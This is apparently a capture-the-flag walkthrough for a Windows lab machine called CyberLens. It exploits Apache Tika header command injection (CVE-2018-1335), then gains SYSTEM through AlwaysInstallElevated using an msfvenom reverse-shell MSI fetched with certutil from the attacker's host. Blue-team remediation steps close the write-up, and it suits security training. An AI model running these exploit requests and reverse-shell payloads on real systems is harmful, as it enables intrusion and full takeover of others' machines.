Target IP: cyberlens.thm (Requires /etc/hosts entry)
Difficulty: Easy
Objective: User (user.txt) & Root (admin.txt) Flags
1. Executive Summary
“CyberLens” is a Windows Server 2019 machine hosting a web analysis tool. We gain initial access by exploiting a Command Injection vulnerability in Apache Tika 1.17 (CVE-2018-1335) running on port 61777. Privilege escalation to NT AUTHORITY\SYSTEM is achieved by abusing the AlwaysInstallElevated registry setting, which allows any user to install .msi packages with SYSTEM privileges.
Key TTPs (MITRE ATT&CK):
- T1190 (Exploit Public-Facing App): Header Injection in Apache Tika.
- T1595 (Active Scanning): Nmap port discovery.
- T1068 (Exploitation for Privilege Escalation): Abusing Installer Privileges (
AlwaysInstallElevated).
2. Operational Setup
Host Configuration
echo "10.10.x.x cyberlens.thm" | sudo tee -a /etc/hosts3. Enumeration
A. Network Scanning
Your Nmap scan was very thorough.
- 80/tcp: Web Server (CyberLens Image Extractor).
- 61777/tcp: HTTP Service.
- 3389/tcp: RDP.
- 135/139/445: Standard Windows RPC/SMB.
B. Service Analysis (Port 61777)
Investigating the non-standard port 61777 is the priority.
- Banner Grabbing:
curl -v http://cyberlens.thm:61777or viewing source often reveals “Apache Tika 1.17”. - Vulnerability: A quick search reveals CVE-2018-1335.
The Vulnerability (Header Injection):
Apache Tika 1.17 allows clients to specify the X-Tika-OCRTesseractPath header. By manipulating this header, we can inject commands that the server executes when processing an image.
4. Initial Access: Apache Tika RCE
Method 1: Metasploit (Your approach)
msfconsole
use exploit/windows/http/apache_tika_header_command_injection
set RHOSTS cyberlens.thm
set RPORT 61777
set LHOST tun0
runStatus: Meterpreter shell as CyberLens user.
Method 2: Manual (Burp/Curl)
For the record, this can be done manually by sending a PUT request:
PUT /meta HTTP/1.1
Host: cyberlens.thm:61777
X-Tika-OCRTesseractPath: "cscript"
X-Tika-OCRLanguage: //E:Jscript
Expect: 100-continue
Content-Length: 0
var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec("cmd /c whoami");5. Privilege Escalation: AlwaysInstallElevated
Enumeration
You ran winPEAS and spotted the golden configuration:
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!What is this?
This is a registry setting intended for corporate environments where standard users need to install software. When set to 1 in both HKCU (Current User) and HKLM (Local Machine), the Windows Installer service (msiexec.exe) installs ANY .msi package with SYSTEM privileges, regardless of who runs it.
The Exploit: Malicious MSI
Method 1: Metasploit (The “Easy” Way)
You likely used exploit/windows/local/always_install_elevated.
This module automatically builds a random MSI, uploads it, and runs it.
Method 2: Manual MSI Generation (The “PoC” Way) It is surprisingly simple to do this manually.
1. Generate the MSI:
We use msfvenom to create a Windows Installer package that executes a reverse shell.
# -f msi : Output format is MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.YOUR.IP LPORT=6969 -f msi -o setup.msi2. Transfer to Target:
# On Attacker: python3 -m http.server 80
# On Target:
certutil -urlcache -f http://10.10.YOUR.IP/setup.msi setup.msi3. Execute:
We use msiexec to run the installer.
# /quiet = No UI
# /qn = No UI
# /i = Install
msiexec /quiet /qn /i setup.msi4. Catch the Shell:
Check your listener (nc -lvnp 6969).
C:\Windows\system32> whoami
nt authority\systemFlags:
- User:
C:\Users\CyberLens\Desktop\user.txt - Admin:
C:\Users\Administrator\Desktop\admin.txt
6. Remediation (Blue Team)
- Patch Apache Tika: Upgrade to version 1.18 or later, where header validation was introduced.
- Disable AlwaysInstallElevated:
- Group Policy: Computer Configuration -> Administrative Templates -> Windows Components -> Windows Installer -> “Always install with elevated privileges” -> Disabled.
- Registry: Ensure the keys in
HKLM\SOFTWARE\Policies\Microsoft\Windows\InstallerandHKCUare set to0or removed.
- Network Segmentation: Management interfaces like Tika (61777) should not be exposed to the general network.